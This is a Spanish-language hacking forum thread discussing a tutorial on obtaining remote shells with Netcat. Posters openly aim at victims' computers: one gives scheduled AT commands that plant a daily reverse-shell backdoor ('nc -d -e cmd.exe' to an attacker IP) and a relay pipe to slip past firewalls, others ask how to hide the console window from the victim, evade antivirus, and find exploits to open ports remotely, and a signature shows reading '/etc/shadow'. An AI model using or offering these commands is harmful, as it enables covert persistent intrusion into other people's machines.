 Autor
|
Tema: Paper: Obtener shell con Netcat (Leído 52005 veces)
|
|
LOKORIP
|
por supuesto que escoge un puerto al azar el netcat mira has la prueba y veras has un netstat y veras que tu estas conectado por un puerto que no es el que tu eligiste.
el que tu eliges es el puerto pero de tu pc en el caso de la reverse shell
|
|
|
|
|
En línea
|
|
|
|
|
Ertai
|
Primero felicidades por este post, es magnifico! Pero ahora tengo unas preguntillas jeje. -Porque no me funciona lo de programar a cierta hora? -Hay alguna manera de que se abra sin que se vea la pantallita negra, que hace sospechar bastante??   Espero respuesta Gracias, Ertai |
|
|
|
|
En línea
|
Si la felicidad se comprara, entonces el dinero sería noble.
|
|
|
|
el-brujo
|
está muy bien el documento.
Es realmente interesante el telnet inverso o shell reverse, ya que la mayoría de firewalls filtran los puertos de entrada, pero no de salida, de manera con un reverse shell es muy fácil saltarse un firewall /router / proxy.
|
|
|
|
|
En línea
|
Give peace a chance
|
|
|
|
Chop
|
Tengo una pequeña duda ala hora de abrir el puerto en la maquina atacada como lo hago sin aceso fisico ???
si espor medio de un exploit por favor recomiendeme uno yo aprendi a usar el LSASS pero ya todo el el mundo esta parchado y baja como 50 exploit y por esta traveciando y asi aprender como funcionan jodi la pc y se me reiniciaba cada vez que me conecto por favor ayuden me
se los suplico
Atte Chop!
|
|
|
|
|
En línea
|
|
|
|
|
NekroByte
|
Instalación:
mkdir netcat &&
tar -C netcat -xvzf nc110.tgz &&
cd netcat &&
mv netcat.c netcat.c~ &&
sed -e 's/res_init();/\/\* res_init(); \*\//' <netcat.c~ >netcat.c &&
mv Makefile Makefile~ &&
sed -e 's/CFLAGS =/# CFLAGS =/' -e 's/\$(STATIC)//' <Makefile~ >Makefile &&
make linux &&
cp nc /usr/bin
El primer sed arregla un error pequeño, si no te fias de él puedes comentarlo
manualmente o borrar la línea #312 del fichero netcat.c. La primera parte
del segundo sed habilita la configuración de CFLAGS en tu entorno (comenta
el -O implícito), la segunda parte habilita el enlazado dinámico, puedes
dejarlo como está si deseas un binario estático. Fuente: http://www.escomposlinux.org/lfs-es/recetas/netcat.htmlHilsener. |
|
|
|
|
En línea
|
-- - -^[NekroByte]^- - --
|
|
|
|
skullzoid
|
Excelente!
Ingenioso y sencillo.
tal como debe de ser el hacking, mas jugo y menos chachara
Sk---"I eat n00bs"---
|
|
|
|
|
En línea
|
|
|
|
|
n3o07
|
Otra duda "zhyzura", para dejar programa una tarea como puerta trasera con el comando AT de ms-dos el comando que colocaste: Código:
at <dia> <hora> "comando"
por lo tanto quedaria asi:
Código:
at /every:1 6:00p ""nc -d -e cmd.exe 192.168.1.2 6000""
o tambien:
Código:
at /every:1 6:00p ""nc 192.168.1.2 80 | cmd.exe | nc 192.168.1.2 25""
primero debe ir la hora a la que se debe ejecutar y después la opción "/every:1", para que se ejecute diariamente...
C:\>at /?
El comando AT programa la ejecución de comandos y programas en un equipo a
una hora y fecha especificadas. El servicio de programación debe estar en
ejecución para utilizar el comando AT.
AT [\\equipo] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\equipo] hora [/INTERACTIVE]
[ /EVERY:fecha[,...] | /NEXT:fecha[,...]] "comando"
\\equipo Especifica un equipo remoto. Si se omite este
parámetro, los comandos se programan en el equipo
local.
id Es un número de identificación asignado al comando
programado.
/delete Cancela un comando programado. Si se omite id, se
cancelarán todos los comandos programados en el equipo.
/yes Se usa con el comando de cancelación de todos los
trabajos cuando no se desea ninguna confirmación.
/interactive Permite a la tarea interactuar con el escritorio del
usuario cuya sesión coincide con el momento de
ejecución de la tarea.
/every:fecha[,...] Ejecuta el comando cada día de la semana o mes
especificado. Si se omite la fecha, se asume que es el
día actual del mes.
/next:fecha[,...] Ejecuta el comando especificado la próxima vez que
aparezca ese día (por ejemplo, el próximo jueves). Si
se omite la fecha, se asume que es el día actual del
mes.
"comando" Es el comando de Windows NT o programa por lotes que se
va a ejecutar.
C:\>
Por lo tanto para obtener una reverse shell tienes que dejarlo: at <hora> /every:1 ""nc -d -e cmd.exe xxx.xxx.xxx.xxx <puerto>""
y para salterse el firewall sería: at <hora> /every:1 ""nc xxx.xxx.xxx.xxx 80 | cmd.exe | nc xxx.xxx.xxx.xxx 25""
Espero les sea de ayuda...  |
|
|
|
|
En línea
|
The Matrix - Believe The Unbelievable
«--´¯`--–…•´--».-.- > µ ∂ η3ο07 ¶ ƒ < -.-.«-`•…–--´¯`-----»
|
|
|
|
Ertai
|
gracias n3o07!
Por casualidad no sabras como volver a cambiarlo?
Quiero decir... Si ya tengo una hora y un dia, poder cambiarlo para otra hora y otro dia...
Gracias,
Ertai
|
|
|
|
|
En línea
|
Si la felicidad se comprara, entonces el dinero sería noble.
|
|
|
|
zhyzura
|
acabo de correguir unos errores del manual para los que gusten volverlo a leer  (gracias G4rb4g3 por la observacion) Primero felicidades por este post, es magnifico! Pero ahora tengo unas preguntillas jeje. -Porque no me funciona lo de programar a cierta hora? -Hay alguna manera de que se abra sin que se vea la pantallita negra, que hace sospechar bastante?? Espero respuesta Gracias, Ertai ya corregui esos detalles Por casualidad no sabras como volver a cambiarlo?
Quiero decir... Si ya tengo una hora y un dia, poder cambiarlo para otra hora y otro dia...
Gracias,
Ertai
simplemente basta con que lo borres por el id en el cual te lo agrego y lo vuelvas a poner o si quieres borrar todo solo teclea: at /del zaludox
|
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
|
Ertai
|
Hoy por la tarde probare si tambien se salta el Norton Antivirus 2005 (que lleva incorporado un firewall), pero para aligerar la cosa podriamos ir poniendo los firewalls mas conocidos que por defecto tienen los puertos 25 y 80 abiertos, para que funcione el tutorial! Es solo una sugerencia Saludos, Ertai |
|
|
|
|
En línea
|
Si la felicidad se comprara, entonces el dinero sería noble.
|
|
|
|
octalh
|
pues yo lo hice así at hora /every:L,M,Mi,J,V,S,D "nc -d -e cmd.exe xxx.xxx.xxx.xxx puerto" así se ejecuta todos los dias de la semana |
|
|
|
|
En línea
|
|
|
|
|
D4N93R
|
una preguntica : el NC no es detectado por lo AV?? si logro entrar a una pc y quiero dejar en NC en escucha cuando lo bajo o cuando se inicie no es reconocido por los AV? gracias  |
|
|
|
|
En línea
|
System.Console.Write("Under Construction!");
|
|
|
|
chrono_trigger
|
oye, gracias por el tutorial pero tengo un problema, no conecta NADA, y cuando digo nada, es nada, ni ips externas ni lan >.<, cuando lo intento con un equipo k esta en red aparece:
NOMBRE-EQUIPO [IP-EQUIPO] PUERTO <?> OPEN
sent 0, rcvd 0: NOTSOCK
si alguien puede decirme k significa esto y como solucionarlo se lo agradeceria mxo >.<
|
|
|
|
|
En línea
|
|
|
|
|
fandango
|
Pon los comandos que has puesto en cada pc.
|
|
|
|
|
En línea
|
user@slackware:~$./w00t
root@slackware:~#
root@slackware:~#cat /etc/shadow
OWNED![/size]
|
|
|
|
chrono_trigger
|
pongo todo tal cual dice la guia, probe la conexión y el revese shell, ese k se supone k te devuelve la shell del equipo victima....
pd: puse todo tal cual pk toy probandolo en lan con una ip 192.168.1.2 y por el puerto 4062 k tiene el abierto.....
|
|
|
|
|
En línea
|
|
|
|
|
 |
